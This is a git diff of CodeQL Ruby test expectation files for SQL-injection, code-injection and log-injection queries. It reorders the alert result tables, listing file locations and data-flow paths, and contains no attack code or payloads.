ActiveRecordInjection.rb:121:20:121:25 | call to params | user-provided value | -| ActiveRecordInjection.rb:123:23:123:47 | ...[...] | ActiveRecordInjection.rb:123:23:123:28 | call to params | ActiveRecordInjection.rb:123:23:123:47 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:123:23:123:28 | call to params | user-provided value | -| ActiveRecordInjection.rb:127:19:127:30 | ...[...] | ActiveRecordInjection.rb:127:19:127:24 | call to params | ActiveRecordInjection.rb:127:19:127:30 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:127:19:127:24 | call to params | user-provided value | -| ActiveRecordInjection.rb:129:29:129:39 | ...[...] | ActiveRecordInjection.rb:129:29:129:34 | call to params | ActiveRecordInjection.rb:129:29:129:39 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:129:29:129:34 | call to params | user-provided value | -| ActiveRecordInjection.rb:141:20:141:32 | ... + ... | ActiveRecordInjection.rb:135:10:135:15 | call to params | ActiveRecordInjection.rb:141:20:141:32 | ... + ... | This SQL query depends on a $@. | ActiveRecordInjection.rb:135:10:135:15 | call to params | user-provided value | -| ActiveRecordInjection.rb:174:21:174:44 | ...[...] | ActiveRecordInjection.rb:174:21:174:26 | call to params | ActiveRecordInjection.rb:174:21:174:44 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:174:21:174:26 | call to params | user-provided value | -| ActiveRecordInjection.rb:188:27:188:76 | "this is an unsafe annotation:..." | ActiveRecordInjection.rb:188:59:188:64 | call to params | ActiveRecordInjection.rb:188:27:188:76 | "this is an unsafe annotation:..." | This SQL query depends on a $@. | ActiveRecordInjection.rb:188:59:188:64 | call to params | user-provided value | -| ActiveRecordInjection.rb:201:37:201:41 | query | ActiveRecordInjection.rb:206:5:206:10 | call to params | ActiveRecordInjection.rb:201:37:201:41 | query | This SQL query depends on a $@. | ActiveRecordInjection.rb:206:5:206:10 | call to params | user-provided value | -| ActiveRecordInjection.rb:210:43:210:104 | "SELECT * FROM users WHERE id ..." | ActiveRecordInjection.rb:206:5:206:10 | call to params | ActiveRecordInjection.rb:210:43:210:104 | "SELECT * FROM users WHERE id ..." | This SQL query depends on a $@. | ActiveRecordInjection.rb:206:5:206:10 | call to params | user-provided value | -| ActiveRecordInjection.rb:211:35:211:96 | "SELECT * FROM users WHERE id ..." | ActiveRecordInjection.rb:206:5:206:10 | call to params | ActiveRecordInjection.rb:211:35:211:96 | "SELECT * FROM users WHERE id ..." | This SQL query depends on a $@. | ActiveRecordInjection.rb:206:5:206:10 | call to params | user-provided value | -| ActiveRecordInjection.rb:216:38:216:53 | "role = #{...}" | ActiveRecordInjection.rb:222:29:222:34 | call to params | ActiveRecordInjection.rb:216:38:216:53 | "role = #{...}" | This SQL query depends on a $@. | ActiveRecordInjection.rb:222:29:222:34 | call to params | user-provided value | -| ArelInjection.rb:6:20:6:61 | "SELECT * FROM users WHERE nam..." | ArelInjection.rb:4:12:4:17 | call to params | ArelInjection.rb:6:20:6:61 | "SELECT * FROM users WHERE nam..." | This SQL query depends on a $@. | ArelInjection.rb:4:12:4:17 | call to params | user-provided value | -| ArelInjection.rb:7:39:7:80 | "SELECT * FROM users WHERE nam..." | ArelInjection.rb:4:12:4:17 | call to params | ArelInjection.rb:7:39:7:80 | "SELECT * FROM users WHERE nam..." | This SQL query depends on a $@. | ArelInjection.rb:4:12:4:17 | call to params | user-provided value | -| PgInjection.rb:14:15:14:18 | qry1 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:14:15:14:18 | qry1 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | -| PgInjection.rb:15:21:15:24 | qry1 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:15:21:15:24 | qry1 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | -| PgInjection.rb:20:22:20:25 | qry2 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:20:22:20:25 | qry2 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | -| PgInjection.rb:21:28:21:31 | qry2 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:21:28:21:31 | qry2 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | -| PgInjection.rb:32:29:32:32 | qry3 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:32:29:32:32 | qry3 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | -| PgInjection.rb:44:29:44:32 | qry3 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:44:29:44:32 | qry3 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | edges | ActiveRecordInjection.rb:8:25:8:28 | name | ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | provenance | AdditionalTaintStep | | ActiveRecordInjection.rb:8:25:8:28 | name | ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | provenance | AdditionalTaintStep | @@ -272,3 +223,52 @@ nodes | PgInjection.rb:43:5:43:8 | qry3 : String | semmle.label | qry3 : String | | PgInjection.rb:44:29:44:32 | qry3 | semmle.label | qry3 | subpaths +#select +| ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:23:77:28 | call to params | ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:23:77:28 | call to params | user-provided value | +| ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:38:77:43 | call to params | ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:38:77:43 | call to params | user-provided value | +| ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:23:77:28 | call to params | ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:23:77:28 | call to params | user-provided value | +| ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:38:77:43 | call to params | ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:38:77:43 | call to params | user-provided value | +| ActiveRecordInjection.rb:16:13:16:26 | "name=#{...}" | ActiveRecordInjection.rb:77:23:77:28 | call to params | ActiveRecordInjection.rb:16:13:16:26 | "name=#{...}" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:23:77:28 | call to params | user-provided value | +| ActiveRecordInjection.rb:30:16:30:24 | condition | ActiveRecordInjection.rb:174:21:174:26 | call to params | ActiveRecordInjection.rb:30:16:30:24 | condition | This SQL query depends on a $@. | ActiveRecordInjection.rb:174:21:174:26 | call to params | user-provided value | +| ActiveRecordInjection.rb:42:30:42:44 | ...[...] | ActiveRecordInjection.rb:42:30:42:35 | call to params | ActiveRecordInjection.rb:42:30:42:44 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:42:30:42:35 | call to params | user-provided value | +| ActiveRecordInjection.rb:46:18:46:32 | ...[...] | ActiveRecordInjection.rb:46:18:46:23 | call to params | ActiveRecordInjection.rb:46:18:46:32 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:46:18:46:23 | call to params | user-provided value | +| ActiveRecordInjection.rb:50:20:50:42 | "id = '#{...}'" | ActiveRecordInjection.rb:50:29:50:34 | call to params | ActiveRecordInjection.rb:50:20:50:42 | "id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:50:29:50:34 | call to params | user-provided value | +| ActiveRecordInjection.rb:55:21:55:43 | "id = '#{...}'" | ActiveRecordInjection.rb:55:30:55:35 | call to params | ActiveRecordInjection.rb:55:21:55:43 | "id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:55:30:55:35 | call to params | user-provided value | +| ActiveRecordInjection.rb:59:21:59:45 | call to [] | ActiveRecordInjection.rb:59:31:59:36 | call to params | ActiveRecordInjection.rb:59:21:59:45 | call to [] | This SQL query depends on a $@. | ActiveRecordInjection.rb:59:31:59:36 | call to params | user-provided value | +| ActiveRecordInjection.rb:64:22:64:46 | call to [] | ActiveRecordInjection.rb:64:32:64:37 | call to params | ActiveRecordInjection.rb:64:22:64:46 | call to [] | This SQL query depends on a $@. | ActiveRecordInjection.rb:64:32:64:37 | call to params | user-provided value | +| ActiveRecordInjection.rb:68:16:68:21 | <<-SQL | ActiveRecordInjection.rb:69:21:69:26 | call to params | ActiveRecordInjection.rb:68:16:68:21 | <<-SQL | This SQL query depends on a $@. | ActiveRecordInjection.rb:69:21:69:26 | call to params | user-provided value | +| ActiveRecordInjection.rb:75:20:75:47 | "user.id = '#{...}'" | ActiveRecordInjection.rb:75:34:75:39 | call to params | ActiveRecordInjection.rb:75:20:75:47 | "user.id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:75:34:75:39 | call to params | user-provided value | +| ActiveRecordInjection.rb:81:32:81:54 | "id = '#{...}'" | ActiveRecordInjection.rb:81:41:81:46 | call to params | ActiveRecordInjection.rb:81:32:81:54 | "id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:81:41:81:46 | call to params | user-provided value | +| ActiveRecordInjection.rb:86:23:86:35 | ...[...] | ActiveRecordInjection.rb:86:23:86:28 | call to params | ActiveRecordInjection.rb:86:23:86:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:86:23:86:28 | call to params | user-provided value | +| ActiveRecordInjection.rb:90:17:90:31 | ...[...] | ActiveRecordInjection.rb:90:17:90:22 | call to params | ActiveRecordInjection.rb:90:17:90:31 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:90:17:90:22 | call to params | user-provided value | +| ActiveRecordInjection.rb:91:19:91:33 | ...[...] | ActiveRecordInjection.rb:91:19:91:24 | call to params | ActiveRecordInjection.rb:91:19:91:33 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:91:19:91:24 | call to params | user-provided value | +| ActiveRecordInjection.rb:95:18:95:35 | ...[...] | ActiveRecordInjection.rb:95:18:95:23 | call to params | ActiveRecordInjection.rb:95:18:95:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:95:18:95:23 | call to params | user-provided value | +| ActiveRecordInjection.rb:99:21:99:35 | ...[...] | ActiveRecordInjection.rb:99:21:99:26 | call to params | ActiveRecordInjection.rb:99:21:99:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:99:21:99:26 | call to params | user-provided value | +| ActiveRecordInjection.rb:107:20:107:55 | "name = '#{...}'" | ActiveRecordInjection.rb:107:31:107:36 | call to params | ActiveRecordInjection.rb:107:20:107:55 | "name = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:107:31:107:36 | call to params | user-provided value | +| ActiveRecordInjection.rb:111:19:111:54 | "name = '#{...}'" | ActiveRecordInjection.rb:111:30:111:35 | call to params | ActiveRecordInjection.rb:111:19:111:54 | "name = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:111:30:111:35 | call to params | user-provided value | +| ActiveRecordInjection.rb:113:18:113:35 | ...[...] | ActiveRecordInjection.rb:113:18:113:23 | call to params | ActiveRecordInjection.rb:113:18:113:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:113:18:113:23 | call to params | user-provided value | +| ActiveRecordInjection.rb:115:26:115:40 | ...[...] | ActiveRecordInjection.rb:115:26:115:31 | call to params | ActiveRecordInjection.rb:115:26:115:40 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:115:26:115:31 | call to params | user-provided value | +| ActiveRecordInjection.rb:116:28:116:42 | ...[...] | ActiveRecordInjection.rb:116:28:116:33 | call to params | ActiveRecordInjection.rb:116:28:116:42 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:116:28:116:33 | call to params | user-provided value | +| ActiveRecordInjection.rb:117:25:117:49 | "b #{...}" | ActiveRecordInjection.rb:117:30:117:35 | call to params | ActiveRecordInjection.rb:117:25:117:49 | "b #{...}" | This SQL query depends on a $@. | ActiveRecordInjection.rb:117:30:117:35 | call to params | user-provided value | +| ActiveRecordInjection.rb:118:27:118:51 | "b #{...}" | ActiveRecordInjection.rb:118:32:118:37 | call to params | ActiveRecordInjection.rb:118:27:118:51 | "b #{...}" | This SQL query depends on a $@. | ActiveRecordInjection.rb:118:32:118:37 | call to params | user-provided value | +| ActiveRecordInjection.rb:119:21:119:35 | ...[...] | ActiveRecordInjection.rb:119:21:119:26 | call to params | ActiveRecordInjection.rb:119:21:119:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:119:21:119:26 | call to params | user-provided value | +| ActiveRecordInjection.rb:120:21:120:35 | ...[...] | ActiveRecordInjection.rb:120:21:120:26 | call to params | ActiveRecordInjection.rb:120:21:120:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:120:21:120:26 | call to params | user-provided value | +| ActiveRecordInjection.rb:121:20:121:34 | ...[...] | ActiveRecordInjection.rb:121:20:121:25 | call to params | ActiveRecordInjection.rb:121:20:121:34 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:121:20:121:25 | call to params | user-provided value | +| ActiveRecordInjection.rb:123:23:123:47 | ...[...] | ActiveRecordInjection.rb:123:23:123:28 | call to params | ActiveRecordInjection.rb:123:23:123:47 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:123:23:123:28 | call to params | user-provided value | +| ActiveRecordInjection.rb:127:19:127:30 | ...[...] | ActiveRecordInjection.rb:127:19:127:24 | call to params | ActiveRecordInjection.rb:127:19:127:30 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:127:19:127:24 | call to params | user-provided value | +| ActiveRecordInjection.rb:129:29:129:39 | ...[...] | ActiveRecordInjection.rb:129:29:129:34 | call to params | ActiveRecordInjection.rb:129:29:129:39 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:129:29:129:34 | call to params | user-provided value | +| ActiveRecordInjection.rb:141:20:141:32 | ... + ... | ActiveRecordInjection.rb:135:10:135:15 | call to params | ActiveRecordInjection.rb:141:20:141:32 | ... + ... | This SQL query depends on a $@. | ActiveRecordInjection.rb:135:10:135:15 | call to params | user-provided value | +| ActiveRecordInjection.rb:174:21:174:44 | ...[...] | ActiveRecordInjection.rb:174:21:174:26 | call to params | ActiveRecordInjection.rb:174:21:174:44 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:174:21:174:26 | call to params | user-provided value | +| ActiveRecordInjection.rb:188:27:188:76 | "this is an unsafe annotation:..." | ActiveRecordInjection.rb:188:59:188:64 | call to params | ActiveRecordInjection.rb:188:27:188:76 | "this is an unsafe annotation:..." | This SQL query depends on a $@. | ActiveRecordInjection.rb:188:59:188:64 | call to params | user-provided value | +| ActiveRecordInjection.rb:201:37:201:41 | query | ActiveRecordInjection.rb:206:5:206:10 | call to params | ActiveRecordInjection.rb:201:37:201:41 | query | This SQL query depends on a $@. | ActiveRecordInjection.rb:206:5:206:10 | call to params | user-provided value | +| ActiveRecordInjection.rb:210:43:210:104 | "SELECT * FROM users WHERE id ..." | ActiveRecordInjection.rb:206:5:206:10 | call to params | ActiveRecordInjection.rb:210:43:210:104 | "SELECT * FROM users WHERE id ..." | This SQL query depends on a $@. | ActiveRecordInjection.rb:206:5:206:10 | call to params | user-provided value | +| ActiveRecordInjection.rb:211:35:211:96 | "SELECT * FROM users WHERE id ..." | ActiveRecordInjection.rb:206:5:206:10 | call to params | ActiveRecordInjection.rb:211:35:211:96 | "SELECT * FROM users WHERE id ..." | This SQL query depends on a $@. | ActiveRecordInjection.rb:206:5:206:10 | call to params | user-provided value | +| ActiveRecordInjection.rb:216:38:216:53 | "role = #{...}" | ActiveRecordInjection.rb:222:29:222:34 | call to params | ActiveRecordInjection.rb:216:38:216:53 | "role = #{...}" | This SQL query depends on a $@. | ActiveRecordInjection.rb:222:29:222:34 | call to params | user-provided value | +| ArelInjection.rb:6:20:6:61 | "SELECT * FROM users WHERE nam..." | ArelInjection.rb:4:12:4:17 | call to params | ArelInjection.rb:6:20:6:61 | "SELECT * FROM users WHERE nam..." | This SQL query depends on a $@. | ArelInjection.rb:4:12:4:17 | call to params | user-provided value | +| ArelInjection.rb:7:39:7:80 | "SELECT * FROM users WHERE nam..." | ArelInjection.rb:4:12:4:17 | call to params | ArelInjection.rb:7:39:7:80 | "SELECT * FROM users WHERE nam..." | This SQL query depends on a $@. | ArelInjection.rb:4:12:4:17 | call to params | user-provided value | +| PgInjection.rb:14:15:14:18 | qry1 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:14:15:14:18 | qry1 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | +| PgInjection.rb:15:21:15:24 | qry1 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:15:21:15:24 | qry1 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | +| PgInjection.rb:20:22:20:25 | qry2 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:20:22:20:25 | qry2 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | +| PgInjection.rb:21:28:21:31 | qry2 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:21:28:21:31 | qry2 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | +| PgInjection.rb:32:29:32:32 | qry3 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:32:29:32:32 | qry3 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | +| PgInjection.rb:44:29:44:32 | qry3 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:44:29:44:32 | qry3 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected index 8232d96d8b76..eae7c03a716e 100644 --- a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected +++ b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected @@ -1,15 +1,3 @@ -#select -| impl/unsafeCode.rb:3:17:3:25 | #{...} | impl/unsafeCode.rb:2:12:2:17 | target | impl/unsafeCode.rb:3:17:3:25 | #{...} | This string interpolation which depends on $@ is later $@. | impl/unsafeCode.rb:2:12:2:17 | target | library input | impl/unsafeCode.rb:3:5:3:27 | call to eval | interpreted as code | -| impl/unsafeCode.rb:8:30:8:30 | x | impl/unsafeCode.rb:7:12:7:12 | x | impl/unsafeCode.rb:8:30:8:30 | x | This string format which depends on $@ is later $@. | impl/unsafeCode.rb:7:12:7:12 | x | library input | impl/unsafeCode.rb:8:5:8:32 | call to eval | interpreted as code | -| impl/unsafeCode.rb:13:33:13:33 | x | impl/unsafeCode.rb:12:12:12:12 | x | impl/unsafeCode.rb:13:33:13:33 | x | This string format which depends on $@ is later $@. | impl/unsafeCode.rb:12:12:12:12 | x | library input | impl/unsafeCode.rb:13:5:13:35 | call to eval | interpreted as code | -| impl/unsafeCode.rb:29:10:29:15 | my_arr | impl/unsafeCode.rb:28:17:28:22 | my_arr | impl/unsafeCode.rb:29:10:29:15 | my_arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:28:17:28:22 | my_arr | library input | impl/unsafeCode.rb:29:5:29:27 | call to eval | interpreted as code | -| impl/unsafeCode.rb:34:10:34:12 | arr | impl/unsafeCode.rb:32:21:32:21 | x | impl/unsafeCode.rb:34:10:34:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:32:21:32:21 | x | library input | impl/unsafeCode.rb:34:5:34:24 | call to eval | interpreted as code | -| impl/unsafeCode.rb:40:10:40:12 | arr | impl/unsafeCode.rb:37:15:37:15 | x | impl/unsafeCode.rb:40:10:40:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:37:15:37:15 | x | library input | impl/unsafeCode.rb:40:5:40:24 | call to eval | interpreted as code | -| impl/unsafeCode.rb:44:10:44:12 | arr | impl/unsafeCode.rb:37:15:37:15 | x | impl/unsafeCode.rb:44:10:44:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:37:15:37:15 | x | library input | impl/unsafeCode.rb:44:5:44:24 | call to eval | interpreted as code | -| impl/unsafeCode.rb:49:9:49:12 | #{...} | impl/unsafeCode.rb:47:15:47:15 | x | impl/unsafeCode.rb:49:9:49:12 | #{...} | This string interpolation which depends on $@ is later $@. | impl/unsafeCode.rb:47:15:47:15 | x | library input | impl/unsafeCode.rb:51:5:51:13 | call to eval | interpreted as code | -| impl/unsafeCode.rb:55:22:55:22 | x | impl/unsafeCode.rb:54:21:54:21 | x | impl/unsafeCode.rb:55:22:55:22 | x | This string concatenation which depends on $@ is later $@. | impl/unsafeCode.rb:54:21:54:21 | x | library input | impl/unsafeCode.rb:56:5:56:13 | call to eval | interpreted as code | -| impl/unsafeCode.rb:61:10:61:12 | arr | impl/unsafeCode.rb:59:21:59:21 | x | impl/unsafeCode.rb:61:10:61:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:59:21:59:21 | x | library input | impl/unsafeCode.rb:61:5:61:23 | call to eval | interpreted as code | -| impl/unsafeCode.rb:64:10:64:13 | arr2 | impl/unsafeCode.rb:59:24:59:24 | y | impl/unsafeCode.rb:64:10:64:13 | arr2 | This array which depends on $@ is later $@. | impl/unsafeCode.rb:59:24:59:24 | y | library input | impl/unsafeCode.rb:64:5:64:25 | call to eval | interpreted as code | edges | impl/unsafeCode.rb:2:12:2:17 | target | impl/unsafeCode.rb:3:17:3:25 | #{...} | provenance | | | impl/unsafeCode.rb:7:12:7:12 | x | impl/unsafeCode.rb:8:30:8:30 | x | provenance | | @@ -73,3 +61,15 @@ nodes | impl/unsafeCode.rb:63:30:63:30 | y | semmle.label | y | | impl/unsafeCode.rb:64:10:64:13 | arr2 | semmle.label | arr2 | subpaths +#select +| impl/unsafeCode.rb:3:17:3:25 | #{...} | impl/unsafeCode.rb:2:12:2:17 | target | impl/unsafeCode.rb:3:17:3:25 | #{...} | This string interpolation which depends on $@ is later $@. | impl/unsafeCode.rb:2:12:2:17 | target | library input | impl/unsafeCode.rb:3:5:3:27 | call to eval | interpreted as code | +| impl/unsafeCode.rb:8:30:8:30 | x | impl/unsafeCode.rb:7:12:7:12 | x | impl/unsafeCode.rb:8:30:8:30 | x | This string format which depends on $@ is later $@. | impl/unsafeCode.rb:7:12:7:12 | x | library input | impl/unsafeCode.rb:8:5:8:32 | call to eval | interpreted as code | +| impl/unsafeCode.rb:13:33:13:33 | x | impl/unsafeCode.rb:12:12:12:12 | x | impl/unsafeCode.rb:13:33:13:33 | x | This string format which depends on $@ is later $@. | impl/unsafeCode.rb:12:12:12:12 | x | library input | impl/unsafeCode.rb:13:5:13:35 | call to eval | interpreted as code | +| impl/unsafeCode.rb:29:10:29:15 | my_arr | impl/unsafeCode.rb:28:17:28:22 | my_arr | impl/unsafeCode.rb:29:10:29:15 | my_arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:28:17:28:22 | my_arr | library input | impl/unsafeCode.rb:29:5:29:27 | call to eval | interpreted as code | +| impl/unsafeCode.rb:34:10:34:12 | arr | impl/unsafeCode.rb:32:21:32:21 | x | impl/unsafeCode.rb:34:10:34:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:32:21:32:21 | x | library input | impl/unsafeCode.rb:34:5:34:24 | call to eval | interpreted as code | +| impl/unsafeCode.rb:40:10:40:12 | arr | impl/unsafeCode.rb:37:15:37:15 | x | impl/unsafeCode.rb:40:10:40:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:37:15:37:15 | x | library input | impl/unsafeCode.rb:40:5:40:24 | call to eval | interpreted as code | +| impl/unsafeCode.rb:44:10:44:12 | arr | impl/unsafeCode.rb:37:15:37:15 | x | impl/unsafeCode.rb:44:10:44:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:37:15:37:15 | x | library input | impl/unsafeCode.rb:44:5:44:24 | call to eval | interpreted as code | +| impl/unsafeCode.rb:49:9:49:12 | #{...} | impl/unsafeCode.rb:47:15:47:15 | x | impl/unsafeCode.rb:49:9:49:12 | #{...} | This string interpolation which depends on $@ is later $@. | impl/unsafeCode.rb:47:15:47:15 | x | library input | impl/unsafeCode.rb:51:5:51:13 | call to eval | interpreted as code | +| impl/unsafeCode.rb:55:22:55:22 | x | impl/unsafeCode.rb:54:21:54:21 | x | impl/unsafeCode.rb:55:22:55:22 | x | This string concatenation which depends on $@ is later $@. | impl/unsafeCode.rb:54:21:54:21 | x | library input | impl/unsafeCode.rb:56:5:56:13 | call to eval | interpreted as code | +| impl/unsafeCode.rb:61:10:61:12 | arr | impl/unsafeCode.rb:59:21:59:21 | x | impl/unsafeCode.rb:61:10:61:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:59:21:59:21 | x | library input | impl/unsafeCode.rb:61:5:61:23 | call to eval | interpreted as code | +| impl/unsafeCode.rb:64:10:64:13 | arr2 | impl/unsafeCode.rb:59:24:59:24 | y | impl/unsafeCode.rb:64:10:64:13 | arr2 | This array which depends on $@ is later $@. | impl/unsafeCode.rb:59:24:59:24 | y | library input | impl/unsafeCode.rb:64:5:64:25 | call to eval | interpreted as code | diff --git a/ruby/ql/test/query-tests/security/cwe-117/LogInjection.expected b/ruby/ql/test/query-tests/security/cwe-117/LogInjection.expected index 123b65ba6767..85299a98c289 100644 --- a/ruby/ql/test/query-tests/security/cwe-117/LogInjection.expected +++ b/ruby/ql/test/query-tests/security/cwe-117/LogInjection.expected @@ -1,11 +1,3 @@ -#select -| app/controllers/users_controller.rb:16:19:16:29 | unsanitized | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:16:19:16:29 | unsanitized | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | -| app/controllers/users_controller.rb:17:19:17:41 | ... + ... | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:17:19:17:41 | ... + ... | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | -| app/controllers/users_controller.rb:25:7:25:18 | unsanitized2 | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:25:7:25:18 | unsanitized2 | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | -| app/controllers/users_controller.rb:27:16:27:39 | ... + ... | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:27:16:27:39 | ... + ... | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | -| app/controllers/users_controller.rb:34:33:34:43 | unsanitized | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | app/controllers/users_controller.rb:34:33:34:43 | unsanitized | Log entry depends on a $@. | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | user-provided value | -| app/controllers/users_controller.rb:35:33:35:55 | ... + ... | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | app/controllers/users_controller.rb:35:33:35:55 | ... + ... | Log entry depends on a $@. | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | user-provided value | -| app/controllers/users_controller.rb:49:19:49:30 | ...[...] | app/controllers/users_controller.rb:49:19:49:24 | call to params | app/controllers/users_controller.rb:49:19:49:30 | ...[...] | Log entry depends on a $@. | app/controllers/users_controller.rb:49:19:49:24 | call to params | user-provided value | edges | app/controllers/users_controller.rb:15:5:15:15 | unsanitized | app/controllers/users_controller.rb:16:19:16:29 | unsanitized | provenance | | | app/controllers/users_controller.rb:15:5:15:15 | unsanitized | app/controllers/users_controller.rb:17:19:17:41 | ... + ... | provenance | | @@ -50,3 +42,11 @@ nodes | app/controllers/users_controller.rb:49:19:49:24 | call to params | semmle.label | call to params | | app/controllers/users_controller.rb:49:19:49:30 | ...[...] | semmle.label | ...[...] | subpaths +#select +| app/controllers/users_controller.rb:16:19:16:29 | unsanitized | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:16:19:16:29 | unsanitized | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | +| app/controllers/users_controller.rb:17:19:17:41 | ... + ... | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:17:19:17:41 | ... + ... | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | +| app/controllers/users_controller.rb:25:7:25:18 | unsanitized2 | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:25:7:25:18 | unsanitized2 | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | +| app/controllers/users_controller.rb:27:16:27:39 | ... + ... | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:27:16:27:39 | ... + ... | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | +| app/controllers/users_controller.rb:34:33:34:43 | unsanitized | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | 